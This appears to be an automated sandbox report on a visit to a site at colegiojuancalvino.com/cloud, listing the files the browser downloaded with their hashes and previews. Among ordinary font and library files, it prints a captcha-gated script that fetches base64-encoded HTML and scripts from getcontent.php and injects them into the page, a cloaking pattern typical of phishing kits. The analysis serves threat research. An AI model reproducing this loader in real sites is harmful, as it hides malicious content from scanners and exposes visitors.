                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2390
                                                                                                                                                                                                                                  Entropy (8bit):5.37475118135558
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:48C11ACBEF780AE9F7BA413A977A9BEE
                                                                                                                                                                                                                                  SHA1:D92B2AD214A1C099D4970D5B3EFA7AC3F16A689B
                                                                                                                                                                                                                                  SHA-256:F9D8E58B6CDCDF7831511B8A69C82BC6B71C335ADE7B7EFA21B634E08CF9789D
                                                                                                                                                                                                                                  SHA-512:609B192202A8D604C5A578AA6DC606EFECDCD73728A42182D7BA1432499BCC43EAFC66635BF14921D616530F9C56C4799135F11F265AB3C48D789F78BA9CE035
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap
                                                                                                                                                                                                                                  Preview:/* devanagari */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v23/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2');. unicode-range: U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;.}./* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v23/pxiEyp8kv8JHgFVrJJnecmNE.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v23/pxiEyp8kv8JHgFVrJJfecg.woff2) format('woff2');.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                  Entropy (8bit):3.75
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                                                                                                                                                                                  SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                                                                                                                                                                                  SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                                                                                                                                                                                  SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCQjgdiZf6AynEgUNU1pHxSEe4C-FfYbiAw==?alt=proto
                                                                                                                                                                                                                                  Preview:CgkKBw1TWkfFGgA=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                  Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1483), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1483
                                                                                                                                                                                                                                  Entropy (8bit):5.792287188828726
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:3852381AC212810C4CF37C3C2EE33C92
                                                                                                                                                                                                                                  SHA1:E02D5E29713BA4F42DE7F0D8459F3F76C0D58EE4
                                                                                                                                                                                                                                  SHA-256:EA35911C53A8FE7D8618FFA8BA546D34144EAA3C259A27ED09E5B3776A570DD2
                                                                                                                                                                                                                                  SHA-512:3030A20033007F1F8566BDBE1DDF5907EB118F32583BD5D8BBC7A60B3AABAEDBD81AA402A7A3DFA694CC6AEFC4C680126DB80D115A60C06D998CBEEFAE27120C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api.js
                                                                                                                                                                                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A7vZI3v+Gz7JfuRolKNM4Aff6zaGuT7X0mf3wtoZTnKv6497cVMnhy03KDqX7kBz/q/iidW7srW31oQbBt4VhgoAAACUeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJEaXNhYmxlVGhpcmRQYXJ0eVN0b3JhZ2VQYXJ0aXRpb25pbmczIiwiZXhwaXJ5IjoxNzU3OTgwODAwLCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ==';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='tre
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):69597
                                                                                                                                                                                                                                  Entropy (8bit):5.369216080582935
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                                                                                                  SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                                                                                                  SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                                                                                                  SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                                                                                                                                  Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28
                                                                                                                                                                                                                                  Entropy (8bit):4.09306920777189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:D27A07D464E295F3C1CF61A49CBE2360
                                                                                                                                                                                                                                  SHA1:7C4599E7632790E7AB5AD115BCCFCC9A99784CBC
                                                                                                                                                                                                                                  SHA-256:237C0693BE2842C7AE54A475FE447B7B5B3C5989E4CB1A40D8196E820BD3FD4A
                                                                                                                                                                                                                                  SHA-512:A9D46CE7322CACE22A73BCE2FBF6D24ECCD906AD74E300305878BDCD3E0C2482A5A9254F3003895929C83EE0954E7A35E84F9DBB3D00A95E9FE5B06512330ABD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:CAPTCHA verification failed.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1872
                                                                                                                                                                                                                                  Entropy (8bit):4.524112300347366
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:EDAE557649C9848DA34F4F1A96809231
                                                                                                                                                                                                                                  SHA1:90D650388574A630ACA77C9940AD5D4F3417242F
                                                                                                                                                                                                                                  SHA-256:A3655BA74E8E15259A3312D3A29196B0F285D31A72FB3F9471406E0E4A3BE451
                                                                                                                                                                                                                                  SHA-512:CD5804D1D1F96260A5066A47452D4600F5EFDC8ADFE420240B777478B96CB66A8D8050A8B0C2943370EDD150B5894C1F35ACDD3A10F0522C4C53BEFD52F9576A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://colegiojuancalvino.com/cloud/js/captcha.js?cb=1745693885
                                                                                                                                                                                                                                  Preview:.(function(){. function onGoogleCaptchaSuccess(token) {. document.getElementById('captcha-container').style.display = 'none';.. var xhr = new XMLHttpRequest();. xhr.open('GET', 'getcontent.php?token=' + encodeURIComponent(token), true);. xhr.onreadystatechange = function() {. if (xhr.readyState !== XMLHttpRequest.DONE) return;.. if (xhr.status === 200) {. try {. . var decoded = atob(xhr.responseText.trim());. var parser = new DOMParser();. var doc = parser.parseFromString(decoded, 'text/html');.. . doc.head.querySelectorAll('link[rel="stylesheet"], script[src]').forEach(function(el){. document.head.appendChild(el.cloneNode(true));. });.. . var container = document.getElementById('content-container');. container.innerHTML = '';. Array.from(doc.body.childNodes).forEach(function(node){. container.appendChild(node.cloneNode(true));.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50758)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):51039
                                                                                                                                                                                                                                  Entropy (8bit):5.247253437401007
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                                                                                                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                                                                                                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                                                                                                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                                                                                                                                                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):78627
                                                                                                                                                                                                                                  Entropy (8bit):6.021107989588146
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:91F35D84BEDCC22DD416FDFADC131581
                                                                                                                                                                                                                                  SHA1:C4AF8129D5D2286D1E891AA0A1BC4F75DBFE2AA1
                                                                                                                                                                                                                                  SHA-256:BDF97CB62142A06E4CE98097791FC65E6B6CFFE5CF514BBDA86AD4BB018463A2
                                                                                                                                                                                                                                  SHA-512:DE1925C4CEF263356CF4614B274003A14A574BF0AE569562BC1F789E71AF2FC0CC7D7C3B2B52985DD1F31F07A1E1206DABCBF674331AB5C03C2FB8D97F83F3AC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/releases/ItfkQiGBlJDHuTkOhlT3zHpB/styles__ltr.css
                                                                                                                                                                                                                                  Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #444746;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10960), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10960
                                                                                                                                                                                                                                  Entropy (8bit):5.4969313257207
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:96ACA5781DE53F1A6E4E787729CB25B7
                                                                                                                                                                                                                                  SHA1:0D59B0E5F89C7D94A9630E303BABB584A3623D52
                                                                                                                                                                                                                                  SHA-256:1E31C49AA79F3D35E0B9DB71C327BE8B913AAA6C3B3C8CBC7541C99BF2F94D60
                                                                                                                                                                                                                                  SHA-512:321FFEEE58D790540C750982CAFA90974657CF119817A9EA421AE04D806A4A73EAFF67EA0E4C498DE3EE5B80F0057E7B531E215FE18A7CAF5BDA951B42C32C20
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://colegiojuancalvino.com/cloud/getcontent.php?token=03AFcWeA4EWagOyOb5cz5U9chFCgO5LBlMdhvJAm6scs56fGf1Ll8PdsvuTR6TTlnuO4G_9qM1_1MslWnnEIpSPZyunV_kbmTSGq04FWu0BT9PalOB9tgs9us1t5a0tgHmUlcQ78CuYjJUdqGZoLEA4YXt2J27dDwjTsGy7kbbCVcfJqs3N7y91WBelC2KX0-OiBhLRIklPdrhV8nj6Wz8zmjngVxsEbkNgM_tcWt5myWXhZ-7b8vCcJpEyoCg9F6lVtnlvZoONWnA8v7obkIEIGrIjNwLAeBDQRG_41JX7j7isuUg2v8OJ6SSz_2PqGTiweRgm2bX2sEqoSoUldGxvvdhjvXcbguuVNPyMBrtIjuovX_2VxVONE0Z1ii_SKoCJCHuubf0XPPBvHak_XERds4qYuP02FVs5G-gXeywUacJxmepC8h3oAWwiTnCrGd4BJW8ELDwfPA3U_yYL08oPeCdk7UisDk472zU2qHB8j-pGVMFCS8f0gDxSEOzkNEBcdKgu-9-Qkkcau5x74APHuZEJLBBWOMQy-a8QWTyrbvyg8JshayUo6jko-OSuHiPql840UrB1Ck2LtfuUeQs-6-bYucC4WSctF06cuLDRnNBD5IiP2_3-xMd5HvPPICrenhAABgBxQBmeHTP5AXGaTiFI8CaaxBJxE9kjmqOg9j58bv4do87S798UrMXdvrXA6AaokkXt7bSijkH9WwL56xXXCG1EqKtI7gMI9-hJg33-K8zVvaL_VSMXrClLu66js0vhadAxwfeBCj6noDf30DuZyGvepVaEodB1wZY8dRakvKTV7BUaBW-b2HzTAUVO9aYeMZ6cZNPc4KzNktAFb7EAqzfTX1zbbNex9TINLLjwKW0hRYA1FoAjgk9mGRJL6pDJZScuBrmdtlBWo99i8cmE3qu6KbZX8GxEeUiUhwByr9-x0hKMj3QqeCOQffsgzCeK0K7grzdezxDqd7razGnwrTFh-Ddo4SvU5Pyj1gVjL5bkdywA9u-1t0v07kkJUjlMnn_5ixdyQg-kHVF9bh_lhhH7pvU_FPmAfEGK69Twk5s0IrCXnAxoX9L39vVuTjLzxAMjnbsvjrobP3BYx6bFG0SuVz4MTSWCeI33sJjRcn6Jmp2_rTvEGcJ0HV20FDiexzy6j6n3cWyaCyJYhx_ApeNRRmqBw2i5MtDrThYe-IPLTEUckRQvRWuELahuzaNdjnnwuK7UzayTKYf1PFiosxJJ5hytp_BPu-6k7X8aGkuvMCspjgCcc4eDjs780FXNuccBB1mAy_Q3m0mDGg-jr4RNUzXPpA9WDDakRFaUUGlkmFrJG5Vg3OhldlWZ6XzWNwTu0gxqiiN0gBbskrfuI9Mr7bLHtXLVaGwZNOraXNYaXcKW03IbMAeI4Y_rCblHlvZ5nkgDymaLmphdedVWQl_k1SXTNcrlYFNbs1yQGT0ZzAi2Kba99pRDWoJCngIUUhN9M38O1pWMhMHwLV5pOU0WcuGxBwPtK-yFmdGPx6vllhXyYYRjWbaIgguHy8n0p_8T8wMeeHX9lLEyj-1p_969ftdkjm0LSuEPzcOt3GNJKD2Zaue1m8HmFoSqckSJsHu6O8P3hQu7wjZ2LIX58Q4DDTRxRP6YcYHWXB0H_2iOrPyXeuOHm5FPaMgjtcHcRYFg0QJch34YQOqy9uimY57c2x_p_y3NiOYi2b6ARJiyRN6EyVKDm-j2TSRNPagz1Uv_OaGhnixpl8MMi3ljKGSmjZEnBvrFNHOZuev18gXYZVxlb6W_KOXBCx3DlgpYyHbJO7S52Wzk-9eTFDlW2lKSd9SamXhPXCYiFJ3I6k-rZvVxZTIs9NNaGmOOH8bzQspYgwlAdtgiPiEfsvm0UWcESqGz6i7Rtgprze_ToEReGrWRQOWPH_mX_D5AZcKdmeFuyyjNZCks82PO6MsyXNj6ef96qdzcN11fstNDYtYuNCa8M1_bWJ5__8r-WR0t7Ld9PL0I_slAEggB4Ik5qCcoT90zLC9-t4ysMnm20d154axa-wjv9HUecrHe-brg9GgSNWEzPqaVPhKdHgt8aolr06f0t-eUrbPjW3M6TUArCKnf-WWCpj6Mx29O4tBipwE52V0RtUQv5MK4rxc0aitCUIUhkhHU6EmlslqfUCbK1nCbQCqPVaJ3OuieHpxfivSnherXs3idQwebs8z_G_PvoK6qCR5SbopOwYibf1aAmlDznCtBAdUa4H9B4F45kVFioV9q-6bfb05iVgNa2Dl0tWv_p5M_g5BgYYxSeHV0XUlo_yX9Ce8l3AYDQijPfwek4OTj5CmP-LE_EBX9y_wJM_i1g1xx3g64yDvLubm0HDtJtbf2fOOpUpewJ5leCDhZquiwkLuKOH4LEG387VQt_ZRHA9ulVBv8xDqMOsEzUP4WSvNwaesr24fQuR0uX1K7Nwjf8pxiU07okqlHnpzrUit1Vr24EFZULoJs_n3SoiPVZM3obtTWTZvs3FjIHnEeTnk_dEp-nXomuk9oBk20dHq1pHiKwN-0sIg-TlP1Vt-FVntAoFIsNF6kvT7nfUucnTp
                                                                                                                                                                                                                                  Preview:PCEtLSBiNjZhMjcyMmY3NTQ1OTIyMmFlMmYwNzQxOTkwNzU3MTlkOTJhNGUzMmFmYmU5YzVmNTJjZjhlYTc4MjlhNmNlMDBjNGJkYzJlN2Y3NjQzMTA3MTJlYmZlMmI2ZWU5NDIzM2FkYzEyN2MxMTkyM2IwMDM5MWIzYWU5NmRjN2ZlNmY2YmRiMGNlZTY1OTk2NTIxYWIyNWNlNGZkN2RhMGJiYTk2ODI4YmZiMjBiMzUxZTE0ZTlkYTk2MTY4MGY5ZDc5ZDEzODEzMzRkMWNkYTk4NDE2MTVlYmY4M2YxYzFmOGRjZjdhMjlkZDQ2NThiNWRjMzUwYzQ4OTU2Y2U4YWYzYTkzYjE2NjNhNjVhZDZhZjAwODhkNGRhYjgyZGVjOWI2MGI2ZTdjYzZlNDJjY2I3NWFhOGUwYjQ5ZDU0ZjQwMzU5ZmUyMzIwZTBjZTkyYmUzMTRhMmJlNTJlZWZlNTRiMzc0MTU4OGM5NTAyMmMyNGQ0NzhjYWFlYjMyZjVkMTEzNDdlMjhlYzAwNDZmYzJiM2Y2ZTY1OWI0OTE5YWY1MmMzYTk0ZWE1ZjE1ZWE2ZjFjNjg2MjU4ZDAwMTRkMDk3ODY1ZGVmZWIyMjQ5ODM5MDQ0MGFiNDVjODY1M2MwMTBmODRmYzg0OWJiZmE5ODA3MmQ5ZWE4MTJjMDBjYzllMGIxYjMxNjZjYTVjN2RhMDc1ZDJjMzg2ZTY2Y2FhYmYzZDk4NzA1ZGEzODBkMjQ0YWE1NGM4MmJjOTRjN2VjMDUwYjY0NDc5YTVmN2QxZDcwYjFmMGI5MmJlNTdkMWRmMWUxZjIyYjVmOWVkZjNjZTI2MjkyM2NiODU2MGY1ODVhZDZhN2ExOWIzYjJlNWU4OTk1YWRmNjg1NmJiZDQ2NWJmYWE5ZjQ0NDZiNjQ0OTE2N2I5YjAxM2RhMjM4NDllZjkwOGJjZDNiYWMwZGMzNDA3NjRhMjg4YjA4ZmIzNThjYTQwMWUzODUz
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):178
                                                                                                                                                                                                                                  Entropy (8bit):4.590996566067135
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:FB92E432F53A93065EC9724330015C46
                                                                                                                                                                                                                                  SHA1:2801DA3048B2B34A054E44D112E4A572750065D4
                                                                                                                                                                                                                                  SHA-256:5F324613B0A5586B2A82C9B641150374096524A0F27F82EDA8563E4164538517
                                                                                                                                                                                                                                  SHA-512:D1D0B6D1A839D22331F35ACBE8EB0D7C73B2AB54E3ECFAA0A2D4403857EAAA42F78F41D25578B8F07550A0539CEEA114E6AFACD84F0D30A68304154E1DA409B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://colegiojuancalvino.com/cloud/img/index.css
                                                                                                                                                                                                                                  Preview:body { margin: 0; font-family: Arial, sans-serif; background: #f4f4f4; }. #captcha-container { text-align: center; margin-top: 20%; }. #content-container { display: none; }
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15344
                                                                                                                                                                                                                                  Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                  SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                  SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                  SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                  Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 450x450, components 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27995
